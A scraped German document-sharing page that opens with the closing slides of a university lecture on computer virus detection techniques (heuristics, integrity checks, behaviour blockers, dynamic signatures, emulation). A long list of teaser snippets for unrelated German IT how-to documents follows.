Merkmale, Entscheidung, ob Virus oder nicht. Vorteil: neue, unbekannte Viren können damit (potentiell) gefunden werden, vollständige Analyse nicht nötig Hauptproblem: zuviele false positives Negative Heuristiken: Suche nach Code, der in Viren garantiert nicht vorkommt (z.b. Dialogboxen) Spektrale Analyse: Histogramm der in einem Programm befindlichen Instruktionen 87 / / 95 Virentypische Merkmale (Auswahl) Integritätsprüfungen Junk Code Dekryptoren Selbstmodifizierender Code virustypischer Code Beispiel: Suche nach dem Marker des PE-Binärformats cmp ax, "MZ" Instruktionen, die der Compiler nicht generiert Ausführung startet am Ende einer Datei (Sprung dahin) Manipulation von Interruptvektoren (MS-DOS) Nutzung undokumentierter Funktionen Zeichenketten mit Obszönitäten ;-) Idee: Viren modifizieren Dateien (Ausnahme?) Bildung einer Checksumme über jeder uninfizierten Datei, Speicherung der Checksumme in Datenbank, späterer Vergleich gespeicherter mit aktueller Checksumme. Realisierungsmöglichkeiten:. externes Programm, periodischer Aufruf, 2. Selbsttest in ausführbaren Dateien, 3. impliziter Test durch OS beim Aufruf (Integrity Shell) 89 / 95 9 / 95 5
16 Integritätsprüfungen Bewertung Behavior Blockers/Monitors Idee: Beobachtung der Aktivität von Prozessen und Blockierung/Meldung von verdächtigen Aktivitäten für bekannte und unbekannte Viren möglich Detektion erst nach Infektion unmöglich, in legal modifizierten oder neuen Dateien Viren zu finden Ursache der Infektion nicht ermittelbar keine Virusidentifikation Datenbank ist ein bevorzugtes Angriffsziel von Retroviren erlaubt potentiell die Ausführung eines Virus Verschlüsselung von Viren wirkungslos nur relevante Operationen beobachten (Aufwand!), z.b. I/O, Systemrufe nachteilig: Payload wird u. U. ausgeführt Beispiel einer verdächtigen Aktion:. Öffnen einer Binärdatei zum Lesen und Schreiben 2. Einlesen des Teils des File Headers, der Startadresse enthält 3. Schreiben des zuvor eingelesenen Teils 4. Seek zum Ende der Datei und Append-Operation 9 / / 95 Dynamische Signaturen Emulation Idee: Ableitung von Signaturen aus der Sequenz relevanter Systemereignisse (z. B. Systemrufe) und Anwendung der statischen Suchverfahren open open read write read write read write close close Syscall Trace open, open, read open, read, write read, write, read write, read, write read, write, close write, close, close dynamische Signaturen (k=3) open, open open, read read, write write, read write, close close, close dynamische Signaturen (k=2) Idee: Code Nutzung eines CPU-Simulators, um Viruscode ungefährdet ausführen zu können innerhalb der Anti-Viren-Software komplexer Code zu verstehen Abbildung: Beispiel (kurzer) dynamischer Signaturen 93 / / 95 Was haben wir gelernt? Techniken der Virusdetektion Scanning Exakte Identifikation Statische Heuristiken Integritätsprüfungen Emulation Nur die Kombination aller Techniken ist erfolgversprechend. 95 / 95 6
Computerviren. Institut fr Computerwissenschaften. Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac.
Computerviren Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac.at Institut fr Computerwissenschaften Computerviren p.1/18 Der I LOVE YOU Virus Computerviren p.2/18 Geschichte
MehrSicherheit für Windows Vista Teil 2: Windows Tool zum Entfernen bösartiger Software
Sicherheit für Windows Vista Teil 2: Windows Tool zum Entfernen bösartiger Software Dieser Artikel ist Teil 2 zum Thema Sicherheit für Windows Vista. Wir zeigen Ihnen hier, wie Sie mit dem kostenlosen
MehrINFOBLATT FÜR DAS NEU AUFSETZEN IHRES COMPUTERS
INFOBLATT FÜR DAS NEU AUFSETZEN IHRES COMPUTERS Sehr geehrter Kunde! Vielen Dank für Ihr Interesse an unseren Dienstleistungen! Sie möchten das Betriebssystem Ihres Computers von Widtmann IT & EDV Dienstleistungen
MehrBackup Premium Kurzleitfaden
Info Memeo Backup Premium bietet viele fortschrittliche automatische Backup-Funktionen und ist großartig für Benutzer von Digitalkameras und für Anwender, die bis zu 50.000 Dateien mit Backups sichern
MehrDas neue Volume-Flag S (Scannen erforderlich)
NetWorker 7.4.2 - Allgemein Tip 2, Seite 1/5 Das neue Volume-Flag S (Scannen erforderlich) Nach der Wiederherstellung des Bootstraps ist es sehr wahrscheinlich, daß die in ihm enthaltenen Informationen
Mehr2. Word-Dokumente verwalten
2. Word-Dokumente verwalten In dieser Lektion lernen Sie... Word-Dokumente speichern und öffnen Neue Dokumente erstellen Dateiformate Was Sie für diese Lektion wissen sollten: Die Arbeitsumgebung von Word
MehrOP-LOG www.op-log.de
Verwendung von Microsoft SQL Server, Seite 1/18 OP-LOG www.op-log.de Anleitung: Verwendung von Microsoft SQL Server 2005 Stand Mai 2010 1 Ich-lese-keine-Anleitungen 'Verwendung von Microsoft SQL Server
MehrDER WING COMMANDER CD³² GUIDE
DER WING COMMANDER CD³² GUIDE powered by www.amigaemuboard.net & www.a1k.org Seite 1/5 Wing Commander ist ein geniales Game, vor allem die CD³² AGA-Version mit 256 Farben genießt unter Amigafans Kultstatus.
MehrWindows 10. Vortrag am Fleckenherbst Bürgertreff Neuhausen. www.buergertreff-neuhausen.de www.facebook.com/buergertreffneuhausen
Windows 10 Vortrag am Fleckenherbst Bürgertreff Neuhausen 1 Inhalt Was ist neu (im Vergleich zu Windows 8.1) Wann lohnt sich ein Umstieg Update Installation von Windows 10 Startmenü Windows Explorer Webbrowser
MehrMailUtilities: Remote Deployment - Einführung
MailUtilities: Remote Deployment - Einführung Zielsetzung Die Aufgabe von Remote Deployment adressiert zwei Szenarien: 1. Konfiguration der MailUtilities von einer Workstation aus, damit man das Control
MehrSpeichern. Speichern unter
Speichern Speichern unter Speichern Auf einem PC wird ständig gespeichert. Von der Festplatte in den Arbeitspeicher und zurück Beim Download Beim Kopieren Beim Aufruf eines Programms Beim Löschen Beim
MehrUpdate auf Windows 8.1 Schrittweise Anleitung
Update auf Windows 8.1 Schrittweise Anleitung Windows 8.1 Installation und Aktualisierung BIOS, Anwendungen, Treiber aktualisieren und Windows Update ausführen Installationstyp auswählen Windows 8.1 installieren
MehrHow to install freesshd
Enthaltene Funktionen - Installation - Benutzer anlegen - Verbindung testen How to install freesshd 1. Installation von freesshd - Falls noch nicht vorhanden, können Sie das Freeware Programm unter folgendem
Mehr4D Server v12 64-bit Version BETA VERSION
4D Server v12 64-bit Version BETA VERSION 4D Server v12 unterstützt jetzt das Windows 64-bit Betriebssystem. Hauptvorteil der 64-bit Technologie ist die rundum verbesserte Performance der Anwendungen und
MehrSenden von strukturierten Berichten über das SFTP Häufig gestellte Fragen
Senden von strukturierten Berichten über das SFTP Häufig gestellte Fragen 1 Allgemeines Was versteht man unter SFTP? Die Abkürzung SFTP steht für SSH File Transfer Protocol oder Secure File Transfer Protocol.
MehrEr musste so eingerichtet werden, dass das D-Laufwerk auf das E-Laufwerk gespiegelt
Inhaltsverzeichnis Aufgabe... 1 Allgemein... 1 Active Directory... 1 Konfiguration... 2 Benutzer erstellen... 3 Eigenes Verzeichnis erstellen... 3 Benutzerkonto erstellen... 3 Profil einrichten... 5 Berechtigungen
MehrArtikel Schnittstelle über CSV
Artikel Schnittstelle über CSV Sie können Artikeldaten aus Ihrem EDV System in das NCFOX importieren, dies geschieht durch eine CSV Schnittstelle. Dies hat mehrere Vorteile: Zeitersparnis, die Karteikarte
MehrUpdate und Konfiguraton mit dem ANTLOG Konfigurations-Assistenten
Update und Konfiguraton mit dem ANTLOG Konfigurations-Assistenten Der Konfigurations-Assistent wurde entwickelt, um die unterschiedlichen ANTLOG-Anwendungen auf den verschiedensten Umgebungen automatisiert
MehrKURZANLEITUNG CLOUD OBJECT STORAGE
KURZANLEITUNG CLOUD OBJECT STORAGE Version 1.12 01.07.2014 SEITE _ 2 INHALTSVERZEICHNIS 1. Einleitung... Seite 03 2. Anmelden am Cloud&Heat Dashboard... Seite 04 3. Anlegen eines Containers... Seite 05
MehrBenutzung der LS-Miniscanner
Benutzung der LS-Miniscanner Seit Januar 2010 ist es möglich für bestimmte Vorgänge (Umlagerungen, Retouren, Inventur) die von LS lieferbaren Miniscanner im Format Autoschlüsselgröße zu benutzen. Diese
Mehrlññáåé=iáåé===pìééçêíáåñçêã~íáçå=
lññáåé=iáåé===pìééçêíáåñçêã~íáçå= Wie kann das LiveUpdate durchgeführt werden? Um das LiveUpdate durchzuführen, müssen alle Anwender die Office Line verlassen. Nur so ist gewährleistet, dass die Office
MehrEinstellen der Makrosicherheit in Microsoft Word
Einstellen der Makrosicherheit in Microsoft Word Stand: Word 2016 Inhalt Inhalt... 2 Allgemeine Anmerkungen... 3 Microsoft Word 2013/2016... 5 Microsoft Word 2010... 10 Microsoft Word 2007... 16 Microsoft
MehrLeitfaden Datensicherung und Datenrücksicherung
Leitfaden Datensicherung und Datenrücksicherung Inhaltsverzeichnis 1. Einführung - Das Datenbankverzeichnis von Advolux... 2 2. Die Datensicherung... 2 2.1 Advolux im lokalen Modus... 2 2.1.1 Manuelles
MehrGibt Daten im erweiterten Format aus. Dies beinhaltet die Angabe von Zugriffsrechten, Besitzer, Länge, Zeitpunkt der letzten Änderung und mehr.
ls [optionen] [namen]: ls zeigt den Inhalt von Verzeichnissen. Sind keine namen angegeben, werden die Dateien im aktuellen Verzeichnis aufgelistet. Sind eine oder mehrere namen angegeben, werden entweder
MehrWORKSHOP VEEAM ENDPOINT BACKUP FREE
WORKSHOP VEEAM ENDPOINT BACKUP FREE Haftungsausschluss Ich kann für die Richtigkeit der Inhalte keine Garantie übernehmen. Auch für Fehler oder Schäden die aus den Übungen entstehen, übernehme ich keine
MehrIntelliRestore Seedload und Notfallwiederherstellung
IntelliRestore Datensicherung IntelliRestore Seedload und Notfallwiederherstellung Daten. Sichern. Online Vorwort Auch größere Datenmengen lassen sich für gewöhnlich schnell über den IntelliRestore SoftwareClient
MehrOUTLOOK-DATEN SICHERN
OUTLOOK-DATEN SICHERN Wie wichtig es ist, seine Outlook-Daten zu sichern, weiß Jeder, der schon einmal sein Outlook neu installieren und konfigurieren musste. Alle Outlook-Versionen speichern die Daten
MehrMetaQuotes Empfehlungen zum Gebrauch von
MetaQuotes Empfehlungen zum Gebrauch von MetaTrader 4 auf Mac OS Auch wenn viele kommerzielle Angebote im Internet existieren, so hat sich MetaQuotes, der Entwickler von MetaTrader 4, dazu entschieden
Mehri:mobile Installation und Produkt-Aktivierung
i:mobile Installation und Produkt-Aktivierung Voraussetzungen und Systemanforderungen i:mobile unterstützt alle Windows Mobile Geräte mit Touchscreen und folgenden Betriebssystemen: o Windows Mobile 2003
MehrFolgende Einstellungen sind notwendig, damit die Kommunikation zwischen Server und Client funktioniert:
Firewall für Lexware professional konfigurieren Inhaltsverzeichnis: 1. Allgemein... 1 2. Einstellungen... 1 3. Windows XP SP2 und Windows 2003 Server SP1 Firewall...1 4. Bitdefender 9... 5 5. Norton Personal
MehrVersion 0.3. Installation von MinGW und Eclipse CDT
Version 0.3 Installation von MinGW und Eclipse CDT 1. Stellen Sie fest, ob Sie Windows in der 32 Bit Version oder in der 64 Bit Version installiert haben. 2. Prüfen Sie, welche Java Runtime vorhanden ist.
Mehr- Zweimal Wöchentlich - Windows Update ausführen - Live Update im Norton Antivirusprogramm ausführen
walker radio tv + pc GmbH Flüelerstr. 42 6460 Altdorf Tel 041 870 55 77 Fax 041 870 55 83 E-Mail info@walkerpc.ch Wichtige Informationen Hier erhalten sie einige wichtige Informationen wie sie ihren Computer
MehrF-Secure Mobile Security for Nokia E51, E71 und E75. 1 Installation und Aktivierung F-Secure Client 5.1
F-Secure Mobile Security for Nokia E51, E71 und E75 1 Installation und Aktivierung F-Secure Client 5.1 Hinweis: Die Vorgängerversion von F-Secure Mobile Security muss nicht deinstalliert werden. Die neue
MehrProgrammierkurs Java
Programmierkurs Java Dr. Dietrich Boles Aufgaben zu UE16-Rekursion (Stand 09.12.2011) Aufgabe 1: Implementieren Sie in Java ein Programm, das solange einzelne Zeichen vom Terminal einliest, bis ein #-Zeichen
MehrSkripte. Beispiel. http://www.icp.uni-stuttgart.de. M. Fyta Computergrundlagen 73/93
Skripte Wie kann ich mir komplexe Befehle merken? Gar nicht aber der Computer kann es für mich! Einfach die Befehle in eine Textdatei schreiben und ausführbar machen #! (Shebang) in der ersten Zeile bestimmt
MehrOPERATIONEN AUF EINER DATENBANK
Einführung 1 OPERATIONEN AUF EINER DATENBANK Ein Benutzer stellt eine Anfrage: Die Benutzer einer Datenbank können meist sowohl interaktiv als auch über Anwendungen Anfragen an eine Datenbank stellen:
MehrAnti-Botnet-Beratungszentrum. Windows XP in fünf Schritten absichern
Windows XP in fünf Schritten absichern Inhalt: 1. Firewall Aktivierung 2. Anwendung eines Anti-Virus Scanner 3. Aktivierung der automatischen Updates 4. Erstellen eines Backup 5. Setzen von sicheren Passwörtern
MehrWichtige Hinweise zu den neuen Orientierungshilfen der Architekten-/Objektplanerverträge
Wichtige Hinweise zu den neuen Orientierungshilfen der Architekten-/Objektplanerverträge Ab der Version forma 5.5 handelt es sich bei den Orientierungshilfen der Architekten-/Objektplanerverträge nicht
MehrAlgorithmen und Datenstrukturen
Algorithmen und Datenstrukturen Dipl. Inform. Andreas Wilkens 1 Organisatorisches Freitag, 05. Mai 2006: keine Vorlesung! aber Praktikum von 08.00 11.30 Uhr (Gruppen E, F, G, H; Vortestat für Prototyp)
Mehr3 Windows 7-Installation
3 Windows 7-Installation 3.1 Grundsätzlicher Installationsablauf In allen bisherigen Windows-Versionen begann der zeitaufwändige Installationsvorgang mit einem anfänglichen Textmodus-Installationsschritt,
MehrBeheben von verlorenen Verknüpfungen 20.06.2005
Vor folgender Situation ist sicher jeder Solid Edge-Anwender beim Öffnen von Baugruppen oder Drafts schon einmal gestanden: Die Ursache dafür kann sein: Die Dateien wurden über den Explorer umbenannt:
MehrSTRG + A = STRG + C = STRG + X = STRG + V = STRG + Alt + Entf = STRG + S =
Wie heißen die Leisten? Was bedeuten die Tastenkombinationen mit STRG? STRG + A STRG + C STRG + X STRG + V STRG + Alt + Entf STRG + S STRG + A = STRG + C = STRG + X = STRG + V = STRG + Alt + Entf = STRG
MehrAblaufbeschreibung für das neu Aufsetzen von Firebird und Interbase Datenbanken mit der IBOConsole
Lavid-F.I.S. Ablaufbeschreibung für das neu Aufsetzen von Firebird und Interbase Datenbanken mit der Lavid Software GmbH Dauner Straße 12, D-41236 Mönchengladbach http://www.lavid-software.net Support:
MehrUpdate auf Windows 8.1 Schrittweise Anleitung
Update auf Windows 8.1 Schrittweise Anleitung Windows 8.1 Installation und Aktualisierung BIOS, Anwendungen, Treiber aktualisieren und Windows Update ausführen Installationstyp auswählen Windows 8.1 installieren
MehrStep by Step Webserver unter Windows Server 2003. von Christian Bartl
Step by Step Webserver unter Windows Server 2003 von Webserver unter Windows Server 2003 Um den WWW-Server-Dienst IIS (Internet Information Service) zu nutzen muss dieser zunächst installiert werden (wird
MehrInkrementelles Backup
Inkrementelles Backup Im Gegensatz zu einer kompletten Sicherung aller Daten werden bei einer inkrementellen Sicherung immer nur die Dateien gesichert, die seit der letzten inkrementellen Sicherung neu
MehrConstraint-Algorithmen in Kürze - Mit der Lösung zur Path-Consistency-Aufgabe 9
Constraint-Algorithmen in Kürze - Mit der Lösung zur Path-Consistency-Aufgabe 9 Prof. Dr. W. Conen Version 1.0c Januar 2009 Genereller Ablauf der Suche Gegeben: Variablen X, Domains D, Constraints R (explizit
MehrNetzwerksicherheit Musterlösung Übungsblatt 4: Viren
Institut für Informatik Alina Barendt und Philipp Hagemeister Netzwerksicherheit Musterlösung Übungsblatt 4: Viren 1 Vorbereitung msg db "Virus" mov ah, 40h mov bx, 1 mov cx, $5 mov dx, msg int 21h ; Write
MehrInhalt. 1 Einleitung AUTOMATISCHE DATENSICHERUNG AUF EINEN CLOUDSPEICHER
AUTOMATISCHE DATENSICHERUNG AUF EINEN CLOUDSPEICHER Inhalt 1 Einleitung... 1 2 Einrichtung der Aufgabe für die automatische Sicherung... 2 2.1 Die Aufgabenplanung... 2 2.2 Der erste Testlauf... 9 3 Problembehebung...
MehrEinrichten einer Festplatte mit FDISK unter Windows 95/98/98SE/Me
Einrichten einer Festplatte mit FDISK unter Windows 95/98/98SE/Me Bevor Sie die Platte zum ersten Mal benutzen können, muss sie noch partitioniert und formatiert werden! Vorher zeigt sich die Festplatte
MehrEs sollte die MS-DOS Eingabeaufforderung starten. Geben Sie nun den Befehl javac ein.
Schritt 1: Installation des Javacompilers JDK. Der erste Start mit Eclipse Bevor Sie den Java-Compiler installieren sollten Sie sich vergewissern, ob er eventuell schon installiert ist. Gehen sie wie folgt
MehrUniversal Dashboard auf ewon Alarmübersicht auf ewon eigener HTML Seite.
ewon - Technical Note Nr. 003 Version 1.2 Universal Dashboard auf ewon Alarmübersicht auf ewon eigener HTML Seite. Übersicht 1. Thema 2. Benötigte Komponenten 3. Downloaden der Seiten und aufspielen auf
MehrDaten verschlüsseln: warum? wie? Das Programm herunterladen und auf dem USB-Stick installieren Dateien mit Challenger verschlüsseln - entschlüsseln
Verschlüsseln und Entschlüsseln von Dateien-Ordnern-Laufwerken Die Themen Daten verschlüsseln: warum? wie? Das Programm herunterladen und auf dem USB-Stick installieren Dateien mit Challenger verschlüsseln
MehrMeldung Lokale Anwendung inkompatibel oder Microsoft Silverlight ist nicht aktuell bei Anmeldung an lokal gespeicherter RWE SmartHome Anwendung
Meldung Lokale Anwendung inkompatibel oder Microsoft Silverlight ist nicht aktuell bei Anmeldung an lokal gespeicherter RWE SmartHome Anwendung Nach dem Update auf die Version 1.70 bekommen Sie eine Fehlermeldung,
MehrEinrichtung des Cisco VPN Clients (IPSEC) in Windows7
Einrichtung des Cisco VPN Clients (IPSEC) in Windows7 Diese Verbindung muss einmalig eingerichtet werden und wird benötigt, um den Zugriff vom privaten Rechner oder der Workstation im Home Office über
MehrFormular»Fragenkatalog BIM-Server«
Formular»Fragenkatalog BIM-Server«Um Ihnen so schnell wie möglich zu helfen, benötigen wir Ihre Mithilfe. Nur Sie vor Ort kennen Ihr Problem, und Ihre Installationsumgebung. Bitte füllen Sie dieses Dokument
MehrNuVinci Harmony Software und Firmware. Anleitung in deutscher Sprache
NuVinci Harmony Software und Firmware Anleitung in deutscher Sprache NuVinci Desktop ( Harmony Programmierung ) Software Für Hersteller und Händler Download über eine abgesicherte Internetverbindung http://harmony.fallbrooktech.net/
MehrDatenbank-Verschlüsselung mit DbDefence und Webanwendungen.
Datenbank-Verschlüsselung mit DbDefence und Webanwendungen. In diesem Artikel werden wir Ihnen zeigen, wie Sie eine Datenbank verschlüsseln können, um den Zugriff einzuschränken, aber trotzdem noch eine
MehrSoftwareupdate-Anleitung // AC Porty L Netzteileinschub
1 Softwareupdate-Anleitung // AC Porty L Netzteileinschub Softwareupdate-Anleitung // AC Porty L Netzteileinschub HENSEL-VISIT GmbH & Co. KG Robert-Bunsen-Str. 3 D-97076 Würzburg-Lengfeld GERMANY Tel./Phone:
MehrVerschlüsseln Sie Ihre Dateien lückenlos Verwenden Sie TrueCrypt, um Ihre Daten zu schützen.
HACK #39 Hack Verschlüsseln Sie Ihre Dateien lückenlos Verwenden Sie TrueCrypt, um Ihre Daten zu schützen.»verschlüsseln Sie Ihren Temp-Ordner«[Hack #33] hat Ihnen gezeigt, wie Sie Ihre Dateien mithilfe
MehrISi. ISi Technologie GmbH. MET -Schnittstelle zu Davis WeatherLink Version 5.7
ISi ISi Technologie GmbH MET -Schnittstelle zu Davis WeatherLink Version 5.7 Einleitung Die MET -Schnittstelle zur Davis -WeatherLink Software Version 5.7 oder höher erlaubt die Online-Uebernahme der Wetterdaten
MehrMemeo Instant Backup Kurzleitfaden. Schritt 1: Richten Sie Ihr kostenloses Memeo-Konto ein
Einleitung Memeo Instant Backup ist eine einfache Backup-Lösung für eine komplexe digitale Welt. Durch automatisch und fortlaufende Sicherung Ihrer wertvollen Dateien auf Ihrem Laufwerk C:, schützt Memeo
MehrFachbericht zum Thema: Anforderungen an ein Datenbanksystem
Fachbericht zum Thema: Anforderungen an ein Datenbanksystem von André Franken 1 Inhaltsverzeichnis 1 Inhaltsverzeichnis 1 2 Einführung 2 2.1 Gründe für den Einsatz von DB-Systemen 2 2.2 Definition: Datenbank
MehrComputeria Solothurn
Computeria Solothurn Seniorinnen und Senioren entdecken den Computer und das Internet Sich mit «TeamViewer» von einem Supporter helfen lassen Diese Anleitung und die Illustrationen wurden unter Mac OS
MehrWie man Registrationen und Styles von Style/Registration Floppy Disketten auf die TYROS-Festplatte kopieren kann.
Wie man Registrationen und Styles von Style/Registration Floppy Disketten auf die TYROS-Festplatte kopieren kann. Einleitung Es kommt vor, dass im Handel Disketten angeboten werden, die Styles und Registrationen
MehrIhr IT-Administrator oder unser Support wird Ihnen im Zweifelsfall gerne weiterhelfen.
Dieses Dokument beschreibt die nötigen Schritte für den Umstieg des von AMS.4 eingesetzten Firebird-Datenbankservers auf die Version 2.5. Beachten Sie dabei, dass diese Schritte nur bei einer Server-Installation
MehrUpdatehinweise für die Version forma 5.5.5
Updatehinweise für die Version forma 5.5.5 Seit der Version forma 5.5.0 aus 2012 gibt es nur noch eine Office-Version und keine StandAlone-Version mehr. Wenn Sie noch mit der alten Version forma 5.0.x
MehrWindows Server 2012 R2 Essentials & Hyper-V
erklärt: Windows Server 2012 R2 Essentials & Hyper-V Windows Server 2012 R2 Essentials bietet gegenüber der Vorgängerversion die Möglichkeit, mit den Boardmitteln den Windows Server 2012 R2 Essentials
MehrVerwendung des IDS Backup Systems unter Windows 2000
Verwendung des IDS Backup Systems unter Windows 2000 1. Download der Software Netbackup2000 Unter der Adresse http://www.ids-mannheim.de/zdv/lokal/dienste/backup finden Sie die Software Netbackup2000.
MehrTapps mit XP-Mode unter Windows 7 64 bit (V2.0)
Tapps mit XP-Mode unter Windows 7 64 bit (V2.0) 1 Einleitung... 2 2 Download und Installation... 3 2.1 Installation von WindowsXPMode_de-de.exe... 4 2.2 Installation von Windows6.1-KB958559-x64.msu...
MehrWindows 7/8 - Backdoor
Wenn wir uns in einer peinlichen Situation befinden hätten wir doch gerne mal eine Hintertür parat um unbemerkt verschwinden zu können?! Aber bitte nicht in unserem Betriebssystem! Mittels eines Registry-Eintrags
MehrBenutzerhandbuch bintec R4100 / R4300 Configuration Management. Copyright 17. Juli 2006 Funkwerk Enterprise Communications GmbH Version 1.
Benutzerhandbuch bintec R4100 / R4300 Configuration Management Copyright 17. Juli 2006 Funkwerk Enterprise Communications GmbH Version 1.0 Ziel und Zweck Haftung Marken Copyright Richtlinien und Normen
MehrLizenzen auschecken. Was ist zu tun?
Use case Lizenzen auschecken Ihr Unternehmen hat eine Netzwerk-Commuterlizenz mit beispielsweise 4 Lizenzen. Am Freitag wollen Sie Ihren Laptop mit nach Hause nehmen, um dort am Wochenende weiter zu arbeiten.
MehrBenutzer und Rechte Teil 1, Paketverwaltung, SSH
Benutzer und Rechte Teil 1, Paketverwaltung, SSH Linux-Kurs der Unix-AG Benjamin Eberle 26. Mai 2015 Wozu verschiedene Benutzer? (1) Datenschutz mehrere Benutzer pro Rechner, insbesondere auf Server-Systemen
MehrHinweis, sofern Sie Probleme beim Download der Excel-Dateien für das LIOS-Makro haben:
Hinweis, sofern Sie Probleme beim Download der Excel-Dateien für das LIOS-Makro haben: Genereller Hinweis: Bitte öffnen/speichern Sie die Download-Datei nicht mit Excel, bevor sie diese nicht über das
MehrLexware professional und premium setzen bis einschließlich Version 2012 den Sybase SQL-Datenbankserver
Eine Firewall für Lexware professional oder premium konfigurieren Inhaltsverzeichnis: 1. Allgemein... 1 2. Einstellungen... 1 3. Die Firewall von Windows 7 und Windows 2008 Server... 2 4. Die Firewall
Mehr1 Vom Problem zum Programm
Hintergrundinformationen zur Vorlesung GRUNDLAGEN DER INFORMATIK I Studiengang Elektrotechnik WS 02/03 AG Betriebssysteme FB3 Kirsten Berkenkötter 1 Vom Problem zum Programm Aufgabenstellung analysieren
MehrAnhang zum Handbuch. Netzwerk
Anhang zum Handbuch Netzwerk Penn Elcom GmbH - Januar 2012 Der Penn Elcom CaseDesigner ist ab der Version 1.0.0.6 komplett netzwerkfähig. Die nachfolgende Kurzanleitung zeigt die einfache Installation
Mehre-seal Gebrauchsanweisung für Novartis Mitarbeiter mit Microsoft Outlook e-seal_2_8_11_0154_umol
e-seal e-seal_2_8_11_0154_umol Gebrauchsanweisung für Novartis Mitarbeiter mit Microsoft Outlook Novartis Template IT504.0040 V.1.8 1 / 9 e-seal_2_8_11_0154_umol_1.0_ger.doc Dokumentenhistorie: Version
MehrBOKUbox. Zentraler Informatikdienst (ZID/BOKU-IT) Inhaltsverzeichnis
BOKUbox BOKUbox ist ein Spezialservice für alle Mitarbeiter/innen der BOKU. Kurzfristiger Austausch von vielen und großen Dateien kann Ihre Mailbox schnell überlasten. BOKUbox ist die perfekte Alternative
Mehr! " # $ " % & Nicki Wruck worldwidewruck 08.02.2006
!"# $ " %& Nicki Wruck worldwidewruck 08.02.2006 Wer kennt die Problematik nicht? Die.pst Datei von Outlook wird unübersichtlich groß, das Starten und Beenden dauert immer länger. Hat man dann noch die.pst
MehrOrdner Berechtigung vergeben Zugriffsrechte unter Windows einrichten
Ordner Berechtigung vergeben Zugriffsrechte unter Windows einrichten Was sind Berechtigungen? Unter Berechtigungen werden ganz allgemein die Zugriffsrechte auf Dateien und Verzeichnisse (Ordner) verstanden.
MehrDatensicherung. Beschreibung der Datensicherung
Datensicherung Mit dem Datensicherungsprogramm können Sie Ihre persönlichen Daten problemlos Sichern. Es ist möglich eine komplette Datensicherung durchzuführen, aber auch nur die neuen und geänderten
MehrAnleitung zum Computercheck Windows Firewall aktivieren oder eine kostenlose Firewall installieren
Anleitung zum Computercheck Windows Firewall aktivieren oder eine kostenlose Firewall installieren Ziel der Anleitung Sie möchten ein modernes Firewallprogramm für Ihren Computer installieren, um gegen
MehrAdvoware mit VPN Zugriff lokaler Server / PC auf externe Datenbank
Advoware mit VPN Zugriff lokaler Server / PC auf externe Datenbank Die Entscheidung Advoware über VPN direkt auf dem lokalen PC / Netzwerk mit Zugriff auf die Datenbank des zentralen Servers am anderen
MehrInternet online Update (Internet Explorer)
Um Ihr Consoir Beta immer schnell und umkompliziert auf den aktuellsten Stand zu bringen, bieten wir allen Kunden ein Internet Update an. Öffnen Sie Ihren Internetexplorer und gehen auf unsere Internetseite:
MehrPeDaS Personal Data Safe. - Bedienungsanleitung -
PeDaS Personal Data Safe - Bedienungsanleitung - PeDaS Bedienungsanleitung v1.0 1/12 OWITA GmbH 2008 1 Initialisierung einer neuen SmartCard Starten Sie die PeDaS-Anwendung, nachdem Sie eine neue noch
MehrBenutzung der Avid Liquid Edition Schnittplätze an der Universität Innsbruck
Benutzung der Avid Liquid Edition Schnittplätze an der Universität Innsbruck Diese Anleitung muss bei jedem Start von Avid Liquid Edition befolgt werden, da sonst das Schneiden der Videos nicht möglich
MehrF-Secure Mobile Security für Windows Mobile 5.0 Installation und Aktivierung des F-Secure Client 5.1
Mit dem Handy sicher im Internet unterwegs F-Secure Mobile Security für Windows Mobile 5.0 Installation und Aktivierung des F-Secure Client 5.1 Inhalt 1. Installation und Aktivierung 2. Auf Viren scannen
MehrComtarsia SignOn Familie
Comtarsia SignOn Familie Handbuch zur RSA Verschlüsselung September 2005 Comtarsia SignOn Agent for Linux 2003 Seite 1/10 Inhaltsverzeichnis 1. RSA Verschlüsselung... 3 1.1 Einführung... 3 1.2 RSA in Verbindung
MehrInformatik für Ökonomen II HS 09
Informatik für Ökonomen II HS 09 Übung 5 Ausgabe: 03. Dezember 2009 Abgabe: 10. Dezember 2009 Die Lösungen zu den Aufgabe sind direkt auf das Blatt zu schreiben. Bitte verwenden Sie keinen Bleistift und
MehrSafeRun-Modus: Die Sichere Umgebung für die Ausführung von Programmen
SafeRun-Modus: Die Sichere Umgebung für die Ausführung von Programmen Um die maximale Sicherheit für das Betriebssystem und Ihre persönlichen Daten zu gewährleisten, können Sie Programme von Drittherstellern
MehrDatenübernahme von HKO 5.9 zur. Advolux Kanzleisoftware
Datenübernahme von HKO 5.9 zur Advolux Kanzleisoftware Die Datenübernahme (DÜ) von HKO 5.9 zu Advolux Kanzleisoftware ist aufgrund der von Update zu Update veränderten Datenbank (DB)-Strukturen in HKO
MehrInhaltsverzeichnis. Handbuch zur Installation der Software für die Bürgerkarte
Inhaltsverzeichnis Haftungsausschlussklausel... 3 Einführung... 4 Anforderungen und Hinweise... 5 Herunterladen der Software... 6 Installation der Software... 7 Schritt 1 Sprache auswählen... 7 Schritt
MehrÜberprüfung der digital signierten E-Rechnung
Überprüfung der digital signierten E-Rechnung Aufgrund des BMF-Erlasses vom Juli 2005 (BMF-010219/0183-IV/9/2005) gelten ab 01.01.2006 nur noch jene elektronischen Rechnungen als vorsteuerabzugspflichtig,
MehrVirtueller Seminarordner Anleitung für die Dozentinnen und Dozenten
Virtueller Seminarordner Anleitung für die Dozentinnen und Dozenten In dem Virtuellen Seminarordner werden für die Teilnehmerinnen und Teilnehmer des Seminars alle für das Seminar wichtigen Informationen,
MehrMaster-Boot-Record sichern
Master-Boot-Record sichern Allgemeines Mit dem Master-Boot-Record (MBR) kommt der normale Computernutzer nur selten in Kontakt, eigentlich nur zweimal. Bei der Installation von Linux wird in der Regel
Mehrneu aufsetzen. Daten sichern... 2 Was man nach dem "Aufsetzen" unbedingt braucht!... 5
neu aufsetzen. Inhalt Daten sichern... 2 Was man nach dem "Aufsetzen" unbedingt braucht!... 5 Wir möchten hier eine Anleitung zum "Neu Aufsetzen" von PC und Laptop geben. Bei den neueren Betriebssystemen
Mehr